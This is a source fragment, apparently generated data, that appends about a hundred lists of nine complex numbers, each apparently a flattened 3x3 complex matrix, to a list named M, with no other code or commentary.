M.append([(12.210761236-28.7638651511j),(53.5014980044+113.245472869j),(-169.356470612+4.34748559847j),(-39.6540883338-17.9649764876j),(129.945466919+88.7047668873j),(-155.649009952+56.0856882486j),(12.1273438976-8.91459916508j),(-41.7819089567+6.18137168103j),(64.8437718448-53.9409017363j),]) M.append([(80.3339215981+63.6686282604j),(6.72133091633-25.9063829415j),(28.7113889009-57.223997067j),(30.9218975086-3.3159730166j),(78.4142582898+1.02086692566j),(-30.8764337183-4.62057457102j),(33.4796776522+53.3496867621j),(-11.2723438301-23.5029140019j),(73.2518201121-58.689495186j),]) M.append([(38.0666258369+5.04681290596j),(3.58266209756+1.57925919202j),(-4.6782103673+4.32441194107j),(0.654638384349-3.11434468259j),(40.7392401899+2.87515167141j),(-1.13897472513-0.270284115837j),(-3.1076819568-7.15828450663j),(-0.481448608455+3.48759865429j),(39.1941339733-1.92196457737j),]) M.append([(47.2180702802+11.8166090126j),(-7.55403127445-7.81739413282j),(-2.08499529684-18.3375624932j),(-18.3182849516-7.50402910604j),(71.3740225198+7.5034047613j),(21.4478797878+1.8114150874j),(-23.1233470505+18.2333844362j),(31.591486148-28.2057278334j),(57.4079072-13.3200137739j),]) M.append([(48.4138298571+4.77328028614j),(1.69048183316-0.552132554124j),(-0.440321967385+0.197256287114j),(6.74295976377-1.71060872824j),(50.1133576602-0.753245646469j),(1.67256500946-2.08371503366j),(-3.57647877879-4.09626478447j),(-2.83527934036+0.746747587889j),(46.4728124827+1.97996536032j),]) M.append([(92.1279767967+4.83953980088j),(-0.835662910245-8.75594065404j),(-9.18208533588-5.92076189512j),(-2.61275731105+3.55509807924j),(100.172673818-6.70733379132j),(-2.08881228107-13.7343203374j),(1.00373960325-3.74108857999j),(0.959058728202+10.1767576164j),(101.699349385+7.86779399044j),]) M.append([(13.5083617668+23.7218726869j),(27.9916826725+4.87288282858j),(12.7661443167-67.4967687815j),(6.29206042088+13.3693467115j),(36.6562088936+2.58588687145j),(20.4757475014-19.6885861034j),(-16.6664748374+8.73634746844j),(6.85067384806+19.2891083578j),(103.83542934-20.3077595583j),]) M.append([(113.873267325+0.635728329003j),(-0.860079247541+14.2502090132j),(8.30500250585-5.12067959665j),(-3.4131404347-0.220153019008j),(115.586926119+1.46159877625j),(-2.32422244829+2.71213980845j),(3.61180523554+5.26445445401j),(7.01672920595-13.8390346557j),(107.539806556+3.90267289475j),]) M.append([(106.854345227+1.04505094476j),(1.92948270387+1.83475194831j),(-4.14563059349-2.63297437749j),(2.17970725598-0.00228132034762j),(107.998643309+2.86869239598j),(3.12600886367+1.87079969374j),(-3.5088346928+2.89910994903j),(4.44709598101-0.579824504717j),(110.147011464+2.08625665927j),]) M.append([(115.765369732+1.65462425902j),(-0.784995970855-0.349259114605j),(0.746829825987-0.42904973566j),(-0.551921918753-0.753447198611j),(114.409061447+2.00809468488j),(1.04686005046-0.389183078239j),(0.9198206588-0.296736697948j),(-0.657651940547-1.0468899097j),(114.825568821+2.33728105611j),]) M.append([(46.9306854054+6.97937542511j),(12.3768913133+17.8655383527j),(6.78708161015+16.9819712239j),(-2.1021328504-6.79715132509j),(32.3397843214-9.24707733638j),(-5.73557594857-11.3364498472j),(7.55532502811-0.735474665915j),(19.2658258717+5.2792978986j),(58.7295302732+8.26770191127j),]) M.append([(128.691399677+38.7838064469j),(-100.357495318+72.3555620325j),(-132.313371262-147.138561849j),(17.217016219+82.4810558567j),(-66.5634544049-33.8091591054j),(43.4136151404-127.153812637j),(-28.1901299666+17.1552654889j),(3.12487128032-32.4969864026j),(60.8720547281+1.02535265854j),]) M.append([(98.0852551176-9.26972649599j),(-3.5757666239-17.4233080999j),(-0.319545550594-24.5306896366j),(-1.20834178449+23.9258831933j),(83.1207752072+16.3975935633j),(-18.5340369534+41.9099653209j),(-17.3767490124+7.6789487485j),(-16.8170629601-26.3004679795j),(69.7939696752-1.12786706732j),]) M.append([(89.980102667-8.26871641106j),(-11.6508062484+0.887568357425j),(11.1850499746-1.10314555553j),(-32.7259834485-29.7033305364j),(51.9861608321+29.0358876529j),(32.1040081512-23.2065675334j),(-18.9115859776+5.3834432249j),(0.18771980052+20.34403978j),(91.0337365009-14.7671712419j),]) M.append([(44.5690148962+4.61410235792j),(4.32787631375+9.15414856606j),(6.47063873901+5.81366352057j),(2.8958561073-17.4411183234j),(48.8153620707+3.73082069968j),(-7.32927817607+3.87132391414j),(8.84050477589+4.6748756912j),(0.924245075023-7.52083802735j),(60.6156230331-2.3449230576j),]) M.append([(41.4156105365-0.774967596549j),(5.13891578047-5.06326334826j),(-8.86403577738-7.32843907817j),(1.92546734349+15.2649428818j),(44.7134019607+9.28616307102j),(4.93724788545+21.6191985403j),(5.76515171779-1.40051863365j),(2.02987475514-6.80683950448j),(51.8709875028-2.51119547447j),]) M.append([(114.227721891+2.95357292125j),(-30.1033209016-12.0255496627j),(26.0350980031-30.0806729255j),(27.883940953+19.5446573425j),(59.970133087-49.2944185165j),(75.7117453697-6.56908916888j),(-25.1698652093+18.6231972043j),(51.8443136423-2.3734509882j),(61.8021450222+52.3408455952j),]) M.append([(78.5900822047+6.04200154263j),(-10.1043498318+2.41813038721j),(-31.1164350815-21.174714558j),(-25.637896535-7.88418347208j),(88.8956746474+0.372906443111j),(-26.6669369108-35.9394199251j),(-50.9042415936+37.8561631194j),(-11.6455523383+9.21649577881j),(63.5142431479-0.414907985744j),]) M.append([(126.694680084-11.2395437522j),(-2.14944591936-5.45566328813j),(-28.0122258752+4.55275561549j),(-1.37644564685-1.02947292247j),(114.216531897+3.56521837924j),(0.979207105781+3.42212140964j),(7.00883902049-15.0130543894j),(-4.15674529139-3.14112685383j),(90.0887880194+13.674325373j),]) M.append([(114.714168447+2.24043912702j),(-0.327128942187+1.40170076644j),(-0.690999503505+0.814594679086j),(-2.57712571308-3.18634459564j),(111.575647165+2.81237678407j),(-1.4063009941+0.808308619093j),(4.3400115872-2.69965145514j),(0.442053729242-3.80953787085j),(114.710184388+0.947184088916j),]) M.append([(74.7359109722-9.82696756782j),(-25.7477276183-17.6717050662j),(18.0772522957+10.4694722292j),(-37.6595231443-2.72270635867j),(75.8370820187+49.9972830335j),(-35.5342038358-30.4359349509j),(-20.3043993726-31.2862571121j),(-33.337295523+37.775882744j),(67.427007009-34.1703154656j),]) M.append([(2.09085380589+7.83537772234j),(3.3697680065-6.68906492617j),(-3.42236758614-3.29757538622j),(-16.2653701053-16.3296330921j),(26.4464993425+8.31897833236j),(7.9021044771-10.5015895243j),(-18.3544699077-28.1075644443j),(23.2361965252+14.4748626052j),(23.4626468516-10.1543560547j),]) M.append([(32.1419632812+2.03577999056j),(0.775835320339-1.88438271823j),(0.362139109203+0.495574570106j),(-0.4481635372+0.0631610726832j),(31.7815185442+2.62857466582j),(-0.511177209685+0.257177418815j),(0.366786017737+0.0323568776673j),(0.080146371563+1.80862112022j),(32.0765181746+1.33564534361j),]) M.append([(48.7779186099-22.0637764228j),(108.637989452+33.4078862819j),(39.2355086184-13.139764089j),(7.55490940616-9.44687732742j),(76.4201771661+19.0064564847j),(16.3279016125-4.5690570632j),(-6.77961082759+11.4283283781j),(-50.1918592597-10.9768722996j),(14.801904224+9.05731993804j),]) M.append([(54.2596075463+1.94560138702j),(-4.642758971+0.207617314615j),(1.14758526324+8.40370805628j),(-1.51573765707-4.13613539031j),(49.161900448+3.87671690401j),(2.96907703025-7.0850919421j),(-1.37354077776-3.03331806915j),(2.06476341097+3.85493073764j),(51.5784920057+0.177681708961j),]) M.append([(68.700141087+0.455963128327j),(12.3000621005+0.952852911537j),(-7.21083644228+13.7974189601j),(10.1433615641-0.90020913432j),(55.6345762687+3.67643973022j),(-2.38050022775+8.96017357699j),(-14.8816562038-22.6891557548j),(-2.44442880141-17.3049677356j),(70.6652826443+1.86759714145j),]) M.append([(58.3887655817+13.5627494441j),(-1.12991324538-12.6539167731j),(-6.00490150703-14.7421975555j),(-20.4705341037-0.538822786183j),(60.4389308092+12.1971190402j),(18.6845677924+7.95829795772j),(-14.6119424728+28.52346843j),(20.2782168848-13.3227604327j),(67.1723036092-19.7598684843j),]) M.append([(67.9859986583+2.40954983416j),(3.02987312703+7.12543748464j),(-33.0378705175-17.997133641j),(-2.99315334246-82.3354343222j),(19.4792842273+0.366136162385j),(-17.4399929371+45.6172999103j),(-39.8252957264+8.64585571331j),(-5.84634109333+4.07622345536j),(66.5347171144+3.22431400345j),]) M.append([(101.600242221+2.07934122438j),(-0.441095220644+0.384997446866j),(12.5624019327-10.8058788959j),(-6.42160987036+7.08740364962j),(117.34038714+3.31567802004j),(1.46677807182-9.2046875376j),(-0.412070895276+2.72419977504j),(1.51257220946-1.2968319546j),(118.05937064+0.604980755585j),]) M.append([(105.250518963+2.03948613791j),(6.89500921129+1.41851369139j),(6.33950263482-1.57462382922j),(-0.283660871341+10.4255260345j),(111.464249809-11.8154024934j),(-4.06046297645-13.7362979437j),(6.39159653822-9.96379172433j),(-7.94104103475+13.3711679596j),(108.285231228+15.7759163555j),]) M.append([(115.154355648+2.49058765833j),(-0.692751216198+0.299061436394j),(0.413056128729-2.38021466334j),(0.343126689793+1.02200009217j),(114.47696809+2.00954247969j),(0.277547164326-1.93651094552j),(-0.0621903804914-0.537577637348j),(0.240865570374+0.93494054604j),(115.368676262+1.49986986198j),]) M.append([(41.8652985261-312.131308986j),(-126.406206707+148.159182886j),(22.7030260182-352.736694999j),(-148.201198177-313.323623059j),(-12.3664757694+210.699556571j),(-138.330610203-356.383438388j),(65.1751259415+93.5158171207j),(6.71790740103-71.5361911446j),(108.501177243+107.431752416j),]) M.append([(85.8009816437+28.1628524938j),(11.0177884962-88.5077736833j),(8.28493020062+111.157069905j),(-29.354219503+86.5562704504j),(108.776624634+13.9261071831j),(-124.920971046+9.71316452103j),(-49.4754161949+46.1332809544j),(60.1785116491+42.8085073448j),(-75.5776062773-36.0889596769j),]) M.append([(104.665650899+3.85950255426j),(-4.99627531444+4.37697006955j),(-5.59981305239-1.26884810753j),(-1.73578612262-8.65051171413j),(107.489725822-6.07835088829j),(7.07071053957-5.52203514504j),(6.14490682908+1.43580200901j),(9.89500125222+0.851936220552j),(111.844623279+8.21884833403j),]) M.append([(70.0481579524+12.8706338429j),(15.1807985115+6.12560144619j),(-16.5091989373+6.15185664828j),(27.2282804743+22.6741348312j),(106.171106721-7.13222795502j),(18.3347146857+8.78992573092j),(-3.50751303964-8.45732522426j),(-1.12080099601-11.6412752506j),(83.7807353265+0.26159411215j),]) M.append([(18.2270462341-35.903233219j),(14.0902285397+0.641969261739j),(42.6870883494+30.335773317j),(-18.7602975231-25.4327757053j),(51.0294477906+6.80738666083j),(50.2882551844-7.89037783568j),(1.10928738784-51.9010770974j),(23.4257625437+14.7716457883j),(75.7435059752+35.0958465581j),]) M.append([(115.752368088-0.69044921978j),(-5.8061578309-3.55800939491j),(-5.80436094585-12.615079448j),(3.80044426128+4.39706261463j),(125.385445691+1.68858450936j),(15.7800163292+6.08794964566j),(-0.337163727337-0.0569002339505j),(-4.62381626251+6.73798570244j),(95.8621862212+5.00186471042j),]) M.append([(110.626763337+1.38059362784j),(1.77293853873+2.54784530569j),(0.463214498787-3.00819621651j),(0.579060553449+1.26683773042j),(114.21001498+0.899530782682j),(-1.07469010093+1.96237443015j),(2.32336569755+0.94786694297j),(0.163218065997-1.27421554592j),(114.163221682+3.71987558948j),]) M.append([(98.6667740594-3.07954500326j),(3.41378631445+8.68379842238j),(-2.1506543922-6.17676727348j),(53.7290744903-42.417375802j),(76.430032396-12.4145081625j),(27.281070176+0.460544320045j),(0.629504724568+65.6448485432j),(33.3536483904-20.91956635j),(97.9031935446+21.4940531658j),]) M.append([(15.2105149214+3.6867852507j),(-59.4185079327+128.462930773j),(-60.2807442215-65.4567629876j),(-10.3983848245+21.7365528773j),(88.7814566394+121.424627381j),(-89.8780714068-0.846677798917j),(-25.8184424364-3.18148048757j),(-151.531606774+111.952652668j),(0.00802843920712-119.111412631j),]) M.append([(7.39636643109+19.7440112177j),(-7.23464751134-14.6427603936j),(19.7150660919+9.11039324197j),(11.8608322607-8.77212637434j),(35.86360567+10.1437379928j),(-9.88913393086-4.16567529612j),(33.0555196361+15.3621451356j),(-10.8801258884+17.1428673916j),(29.7400278989-23.8877492106j),]) M.append([(33.6809861135+1.65759876202j),(-0.965199079488-1.00504405481j),(-0.667623199312-1.13745451532j),(-0.0118503702464-3.55901546409j),(30.2162641174+3.36721069466j),(-1.81208415943+1.07795356749j),(1.70876325322+0.673333189541j),(-0.0900806016146-1.19355432427j),(32.102749769+0.975190543323j),]) M.append([(59.4111956927+3.45697870189j),(11.1914413395-13.0088431587j),(0.0543144087135+1.84788764869j),(10.5047801463-3.66262690395j),(59.306875445+4.51842240337j),(6.21893549765-8.05392520767j),(9.82533252921+0.260230973488j),(-7.49151529619+18.6029918648j),(67.2819288622-1.97540110525j),]) M.append([(99.719266085+0.0712808411087j),(6.96581304353-0.0945971243828j),(-21.8118912088-3.04439007674j),(-2.51415106698-3.89876375309j),(109.349070141+13.7770457407j),(66.5858067598+8.80092277833j),(8.09467309412-5.07750726294j),(4.65827835137-11.8886518839j),(47.9316637743-7.84832658176j),]) M.append([(59.7291174891+13.9684609613j),(-3.23883166375-29.8374752474j),(-19.037070324-8.09726633325j),(-5.07126153149+26.2479973449j),(77.6319039643-8.76755003445j),(-2.69540287025-24.4525944489j),(4.785388463+7.44755056677j),(-8.61444271735-5.8685640397j),(32.6389785466+0.799089073147j),]) M.append([(79.8736854485+13.2314743399j),(-57.2521304314+7.17579053317j),(-15.0157932888+43.2347295742j),(-12.3654128084+6.36703028001j),(46.8634729793-14.1425856742j),(-10.4666995142-16.1912483987j),(1.53539646387-14.2102663703j),(-2.03779565382+28.7293295178j),(64.2628415723+6.91111133434j),]) M.append([(48.9733915444-3.14972802432j),(-2.18360966593-2.07658093994j),(2.26752733456-2.83955090736j),(-4.68007545235+3.81068895933j),(47.1492503444+4.74688105704j),(-2.80306713475+0.994986049577j),(-4.39255442153+7.10573482328j),(-0.854595329409-0.475090528641j),(40.8773581112+4.40284696728j),]) M.append([(78.6461304031-16.4451170107j),(14.3777489587-18.010635252j),(-20.7315646111-21.5082792986j),(-4.75781844851+5.8764731029j),(37.4806402436+4.22602070878j),(5.97973138763+6.05714447462j),(-27.8456293946+43.9650852936j),(-16.2306512847+33.9489801847j),(90.8732293533+18.219096302j),]) M.append([(86.007400103-3.92452544974j),(-17.5767029457-10.1224952478j),(1.38962967358+6.45311166743j),(-10.6923630242-2.94144340107j),(66.3741534901-3.51672112816j),(3.58674126762+4.67478340197j),(5.72576970978-25.1362313253j),(1.45072428723-59.4940792903j),(80.6184464069+13.4412465779j),]) M.append([(38.6872154437+2.00555797297j),(2.67860858377-2.06703393145j),(-5.52598899902+1.44964283101j),(7.75435664215-4.28134486005j),(34.3445430468+6.51913671671j),(11.2415414578+2.29892420215j),(-0.986162948392-5.32302897101j),(1.76817994488+4.22460691652j),(44.9682415095-2.52469468967j),]) M.append([(65.2703052119-174.168584404j),(18.0257503589-112.575727634j),(-88.6696808281-63.5701902148j),(-15.2773629549+226.213760287j),(32.6512296359+146.236453092j),(102.956803091+76.0442272478j),(-28.1292567354+88.9372644749j),(-18.1909933233+58.2235597952j),(78.0784651522+33.9321313126j),]) M.append([(50.6475307666+0.875468415288j),(8.03201337529+12.0547793453j),(-1.81822448434-6.54600895484j),(-0.0402192466752+0.235168431302j),(45.467397726+2.58527442255j),(1.64813722962-1.22649618302j),(0.794264321839+0.108607571641j),(-0.181774789224+2.88323353764j),(48.8850715074+2.53925716216j),]) M.append([(100.535417458+8.78485236018j),(0.028184429588+10.7476249602j),(-4.20127337207-2.15285116634j),(-2.42319653933-13.602660754j),(102.786408578-8.74507601265j),(1.13006644146+7.36691811157j),(1.4823001145-7.55525049202j),(8.72326616645-2.79907288614j),(90.6781739642+5.96022365247j),]) M.append([(28.8379928012+12.0275931466j),(-24.6484170899+32.3337321052j),(10.8929779742-23.4020779724j),(-20.5704583025-19.3851117508j),(59.2869048976-30.8395389593j),(-32.575057756-2.31002468348j),(2.49133999664+22.0468570286j),(-46.1538710341+1.41589643458j),(65.8751023012+24.8119458127j),]) M.append([(131.413068872+43.7149866522j),(54.8926142982-8.88661623702j),(-57.6664485341-11.8430368473j),(3.638932302-35.3044407266j),(74.829208383-7.03178255077j),(40.9145034362+27.3330316264j),(-25.6656770082+2.62772687272j),(-0.662346065954+32.2256129455j),(130.757722745-30.6832041014j),]) M.append([(103.289761531+29.6050907173j),(13.3975139967+9.05591014517j),(-6.52138889187-1.8937110179j),(33.3816460839-11.2941118866j),(111.19038783-17.6967059149j),(2.260620581+7.16088428068j),(-39.8346197912-3.33691801601j),(-10.2689609565+20.8547675986j),(110.51985064-5.90838480247j),]) M.append([(115.500852886+1.34965804047j),(-0.0344119927132+0.806327502387j),(0.888089974537-0.462968274794j),(-0.0764923866827-1.54594806744j),(115.112458697+2.10911912685j),(-0.97238862592-0.805265252028j),(-2.04953883548-0.269108939647j),(0.0822693114478+1.01786324657j),(114.386688417+2.54122283268j),]) M.append([(45.6717494222-7.4886280638j),(3.56244099682-14.7591898439j),(-6.98061497716-15.3793433357j),(9.21907507409+6.02918112866j),(46.9417536264-7.36765119354j),(11.8174746589-5.30332343189j),(-10.555265734+12.2778969363j),(3.44436283829+5.45835902768j),(45.3864969514+20.8562792573j),]) M.append([(61.9514416435+29.0289676103j),(-15.548142+29.2424958785j),(12.7731746853-12.8405786894j),(-11.0932293935-77.2242773558j),(51.3860921332-3.87258646942j),(-21.9779541718-3.22425908894j),(66.0409088029-19.8276319495j),(10.2928710619+37.0434643401j),(9.66246622335-19.1563811409j),]) M.append([(102.7818099-41.9168662288j),(-30.017782344-24.4998457787j),(34.5496985303-33.3073791924j),(0.65254387895-14.3138469991j),(95.6641204886-1.10451847027j),(10.9492027159-14.1520254083j),(5.04843007123+67.2555498923j),(55.6189053297+52.296898578j),(52.5540696115+49.021384699j),]) M.append([(76.4850619706-5.9985030543j),(26.9719170573+1.92626493444j),(-21.721052282-20.5191626828j),(15.1964938701-39.7310458371j),(98.6107094684+65.5978181199j),(37.4962123199-60.3236240785j),(-27.7169345987-28.2053573401j),(54.5486393414+20.5065534082j),(58.904228561-53.5993150656j),]) M.append([(38.4563057546+1.24823532911j),(25.1901222132+6.6946284412j),(-28.6448691073-0.960459530785j),(19.9542319683+9.3150501126j),(40.6601390384-11.2548868503j),(25.1346647646+10.4333004938j),(10.5813781544+11.8249888265j),(-10.0395913865-14.5858850633j),(74.883555207+16.0066515212j),]) M.append([(70.9874843563-35.6741681639j),(20.8419455652-19.7404107835j),(-4.91735467779-32.6186652355j),(-57.2460733957-1.3894110949j),(11.1821358256-12.5950738399j),(-35.2610130026+28.2951623384j),(-30.9337063299+54.095655378j),(-38.1963431271+23.197094323j),(55.8303798181+54.2692420039j),]) M.append([(87.7330057671+11.0234028978j),(23.0433625455-4.73232867856j),(24.6046727868+0.161934334672j),(36.754890021-6.33635984598j),(54.6733234982-4.76399626746j),(-15.8369187451-26.97285075j),(8.1813271894-0.558055738763j),(-4.73860802338+4.03074056524j),(93.5936707347-0.259406630309j),]) M.append([(52.913903016+36.8042027922j),(28.9478960869+102.36534082j),(69.9978570363+36.399719837j),(50.0412460519-20.9508216114j),(95.8958047756-76.4645389656j),(-71.47090294-24.1670923867j),(-17.8189211044-28.5119572379j),(-54.4907197694+13.7702402618j),(82.1902922083+45.6603361735j),]) M.append([(113.775862585+2.48659901455j),(2.58367391894+5.65167330643j),(-3.81784830921+2.19772048314j),(-0.892069547309-3.14505646754j),(104.544774003+4.92289596862j),(-1.06151422951-4.75968509415j),(-1.97174480868-1.49950693528j),(-7.67135758712+3.29181007296j),(112.679363412-1.40949498317j),]) M.append([(114.156543931+4.7402348464j),(-0.481854453353+0.232476154222j),(-2.07153570229-0.863637764288j),(-3.94976099565+0.28709446522j),(113.265196994+0.399370163369j),(-1.4907358603-2.79059885158j),(-3.38843031534+1.68494257066j),(-2.21364632162+0.431012909286j),(113.578259075+0.860394990233j),]) M.append([(77.8131672081+23.7288065016j),(-36.3888046074+31.7249583428j),(49.9441868438-15.5955358881j),(5.26162090865-14.6063571776j),(80.9482689235+16.1084377367j),(-9.48465221299-24.3753205939j),(25.8667748768-6.51560906994j),(15.8512571708+36.4930700204j),(59.2385638684-33.8372442383j),]) M.append([(10.1835369903-3.79683232455j),(-4.93218873117+1.82479533235j),(-7.45217998767-8.11712605308j),(-2.39178090705+3.64517458102j),(12.4954681034+2.49446436611j),(2.05791598828+7.65321891763j),(5.29341111277+11.4949998171j),(5.14609039125-7.78840106339j),(29.3209949064+7.30236795845j),]) M.append([(31.2933937185+1.86771957466j),(-1.29364692946-0.631067559033j),(1.69802824126-0.694644484555j),(0.803338652501+0.0355747942651j),(32.9174260484+2.56588513756j),(-0.878924312448-0.0419459563892j),(-0.250160241191-0.230509768305j),(-0.198688747431-0.0662710892346j),(31.789180233+1.56639528778j),]) M.append([(-30.3298219555+25.995061535j),(23.235583897+58.2830957577j),(-22.2029395845-53.6216526552j),(16.1058281997+40.2284792073j),(69.8495707099-14.0920172973j),(-34.5531859451+14.2348210695j),(-7.7491988555-79.3354057818j),(-74.843143361+8.54244622656j),(100.480251246-5.90304423765j),]) M.append([(47.3412736169-0.990086280345j),(-2.20765895901+2.88640472622j),(-5.45541059765-2.30962579731j),(-0.951811972742-1.67581299146j),(50.8947751438+6.21595193448j),(-7.24314930845-0.982190184187j),(-0.0729239648723+5.55937724572j),(-4.72349151304-2.39729883101j),(57.7639512393+0.774134345862j),]) M.append([(50.6620898324-2.56085591719j),(-2.30736221178-18.475444831j),(15.7863885095-9.86827223985j),(7.56673604526+2.87341915026j),(71.1684522864-1.79920280553j),(9.58301212971+19.5152089972j),(5.98258750414-2.1177668181j),(14.7493607543-21.4122051251j),(73.1694578812+10.3600587227j),]) M.append([(59.7314606678-3.52002946165j),(8.10352205929+19.0906700559j),(14.7368533179+12.9202660116j),(-3.43071181945-6.43899602497j),(56.1242951945-1.88973055179j),(6.56273143857-6.42502972877j),(14.3026101736-9.77379356622j),(19.1567094536+20.4159352704j),(70.1442441377+11.4097600134j),]) M.append([(66.6566880897+24.8111270815j),(58.8999295373-36.1210582673j),(71.7590527922+24.3074568688j),(7.92726161303+13.3855602014j),(52.5764313083-24.5313003064j),(32.8231627127+8.77061219793j),(7.28812398422-21.7092700652j),(34.8856068807+6.63291903963j),(34.766880602+5.72017322488j),]) M.append([(111.655878445+0.966080265427j),(-5.40187365334-4.70367622441j),(-0.0165040566067-0.201908747759j),(-7.42224073252+10.9885715194j),(106.078079362-2.47761972353j),(-3.14217300037-7.67121446847j),(0.300906951793-8.93461265459j),(3.47484673472+0.287167612889j),(119.266042194+7.5115394581j),]) M.append([(109.362089257+7.04890010989j),(5.83260238267+4.09907403375j),(-8.99368021787+4.04986514994j),(1.13629257752-3.01125050904j),(109.974144787+2.32036274449j),(3.86149686784-0.428977446291j),(-4.75129266571-0.75142249279j),(-0.315170014267+3.67763341999j),(105.663765956-3.36926285438j),]) M.append([(115.737058025+0.690681550723j),(-2.79149776471-2.56607797214j),(3.73725088669-2.17454124882j),(0.697313679272-0.373456299514j),(115.984291876-0.615685557238j),(2.10861915734+1.48477193829j),(0.880092977498+1.25191716477j),(3.72890721461+0.825800606568j),(113.278650098+5.92500400652j),]) M.append([(51.5168770426+0.874075896707j),(14.1033390692-7.36113593012j),(7.31709667656+17.1612310225j),(11.168134208+5.11421633118j),(49.9745962393+4.18046002677j),(-6.28070008699+14.9814728245j),(2.91858477861+3.03032663865j),(-3.77022960456+4.32395175868j),(36.5085267181+0.945464076523j),]) M.append([(55.0560736493-10.6420266179j),(-45.4410146717+28.6479808619j),(21.0155889531-2.77243999532j),(-28.0390546823-55.7878408541j),(57.5832119131+52.9096002894j),(-9.12212368798-26.359021954j),(-16.2988878826-81.9801253405j),(45.1951566185+83.6350843894j),(6.36071443762-36.2675736715j),]) M.append([(111.881532978-6.68096196433j),(-5.54704434057-6.13331608061j),(1.35664514976+2.47737636586j),(-11.640323229+0.833639801093j),(105.762389389+5.90496086024j),(6.23135641967+0.087436691162j),(2.22690997636-5.69446691731j),(0.996663393152-3.42840537259j),(106.356077632+6.77600110409j),]) M.append([(90.4985902026+12.1494077163j),(16.7886342212-13.2132019834j),(-9.6579087467-9.05231418378j),(5.12796980434+16.6994373024j),(88.002610568+11.2555833718j),(10.9869474657-20.5201248975j),(0.18885012114-7.17177912242j),(28.9283636669+19.4699955288j),(81.4987992294-17.4049910881j),]) M.append([(45.8930346197+1.79740035247j),(17.8518331716+18.3223466108j),(33.4516086597+8.73101830247j),(1.87429489371-2.90638159042j),(37.9089763482+4.07110491683j),(9.66682574337+3.42024969739j),(43.7109304182-13.4416232606j),(45.1278424014+4.48238835581j),(61.197989032+0.131494730698j),]) M.append([(103.127974166+5.41064171633j),(-5.6257658516-1.79682783001j),(2.20562810311+1.01779364572j),(-5.04154930953+2.24228724555j),(113.106178543+1.69286008355j),(1.65593534621-0.623178979819j),(5.68754153921+12.2644322392j),(-2.24562088107+4.90400726955j),(120.765847291-1.10350179988j),]) M.append([(112.539836144+5.38417534312j),(0.657644491576+2.48605863342j),(4.47647831141+2.84903577831j),(-1.48141310931+1.68751171095j),(114.684051315+3.73870098009j),(1.82579157621+1.89130428706j),(2.68978077107-2.38223456079j),(2.46332388691-3.13599258761j),(111.776112541-3.12287632321j),]) M.append([(55.0943534488-96.4217183739j),(70.970434613+93.8473088073j),(10.974611201-18.5294395062j),(-0.166767484634-87.2231042988j),(124.274357203+91.2638255449j),(15.2695359946-6.94132829243j),(-7.85002248606+122.005631456j),(-5.32822724836-125.523295324j),(93.6312893482+11.157892829j),]) M.append([(9.26186240747-7.1537237261j),(48.9616774188-2.98753051221j),(37.7438674535+20.9610001949j),(2.20160249841+21.6374342225j),(9.04266898518-29.2597153542j),(0.0163364251274-34.0650476749j),(-29.9814263602-17.9651084093j),(84.9675378586+19.1015215156j),(85.6954686074+42.4134390803j),]) M.append([(3.1820027907+10.5380666358j),(-46.5643626486+2.39481939722j),(-27.9718744433-11.2790579002j),(15.0866547373+10.0395335922j),(52.248410084+23.1790262089j),(6.51578556079+17.3020762348j),(-29.4978755502-14.9561571861j),(-40.0388648948-33.0844806672j),(17.5695871253-27.7170928447j),]) M.append([(29.8143363282+2.20991177651j),(-1.19228361581-0.23438711027j),(1.51605271717+0.350267762263j),(-2.25739013354+1.57576658736j),(31.4038834054+3.99064137379j),(1.01656397966-1.26576966153j),(-4.24766693926+3.28865737234j),(-2.1121354034+2.89714150479j),(34.7817802664-0.2005531503j),]) M.append([(61.492520821+2.31754670126j),(-0.356346339476+0.638080996259j),(3.28854931828+1.20333657149j),(5.48718135284-7.06966670123j),(51.8846994715+0.0441277762119j),(2.26844274112+1.48872185276j),(15.8230654454-10.2457966893j),(-13.0955399654-11.2573036358j),(73.6227797075+3.63832552252j),]) M.append([(130.417458726+63.9786714315j),(80.602668771-9.86771384583j),(-27.5727752633-80.1977781991j),(-36.8584932455-90.1534057822j),(-17.8593644072-9.65444304349j),(3.63490249763+83.5973898599j),(-48.7140514282+70.4104206023j),(42.9746506428+84.1808931389j),(145.441905681-48.324228388j),]) M.append([(56.4634552902-59.7403802896j),(-53.3226049257+4.67935254408j),(-28.0758327452-13.2984333188j),(-50.4627957972-6.34271522374j),(52.7384108288+47.4309831207j),(-7.64398946761+23.6939827442j),(-31.7088611729+59.5943476025j),(49.7819168585-2.67012823227j),(60.798133881+18.3093971689j),]) M.append([(116.129247697-42.1909176726j),(3.09589493154-72.4039985688j),(-108.316395131+9.75349058829j),(-35.0765937087-36.3554228774j),(1.88645808915+7.1593541859j),(13.7698469977+63.1230337113j),(-36.768100284-18.6542366857j),(-31.1651117047+12.0985352761j),(72.9842942136+41.0315634867j),]) M.append([(47.8384695415+7.61835814632j),(-4.68457543387-1.35625835057j),(8.85318718738-9.99387872788j),(-10.6868568595-2.37776833316j),(49.3691642238-1.65451482653j),(3.11276503767+17.6708283578j),(4.96744946454-1.58829160504j),(1.39770615655+2.94483872996j),(39.7923662347+0.0361566802092j),]) M.append([(68.1103508994+19.2735200806j),(-5.47298973979-22.7206311726j),(-10.7553953552-49.9202984641j),(-21.2347050047-22.8800930653j),(49.5642429726+28.4855936265j),(4.54808870367+61.4476307065j),(-6.26678397014+34.7010453322j),(16.913418836-21.5557585882j),(89.3254061281-41.7591137071j),]) M.append([(69.0548819869+10.383276184j),(1.72256037827+21.839841478j),(-14.4183742012-10.2781311919j),(-4.30912100901-16.7426922885j),(77.849790171+1.94139967775j),(8.66803488062-8.62946793273j),(-11.0606064396-1.45580565455j),(-3.86375651961+12.4171384245j),(87.0953278421-6.32467586172j),]) M.append([(44.8961030217-2.20393862305j),(-2.97530688812+4.94829060529j),(4.30106153429+1.28752791483j),(3.19749147899-22.1381349013j),(39.5824578951+21.9048719284j),(18.5215332047-3.86821353118j),(-18.8998527617+1.98529778826j),(18.2669115306-3.45866410364j),(33.5214390832-13.7009333054j),]) M.append([(47.011235086+4.23064566306j),(-10.6335506913+13.3635298926j),(-0.219467770613+6.26867840659j),(-22.5323740811-6.69709176341j),(76.8646509743+3.86909932402j),(-3.45653125342-18.9476653628j),(-5.12035958768-19.6764298366j),(-16.4483181634+21.3558008629j),(52.1241139397-2.09974498708j),]) M.append([(52.3324959447+2.08568973534j),(-1.14976344363-0.296202926219j),(-1.86742940105+3.91490318357j),(4.04612633633+0.647186855537j),(46.2920273898+1.12560556588j),(-2.93048335156+2.34169218088j),(0.743275124866+1.09680507504j),(-1.28612600965-0.173770095868j),(46.3754766655+2.78870469878j),]) 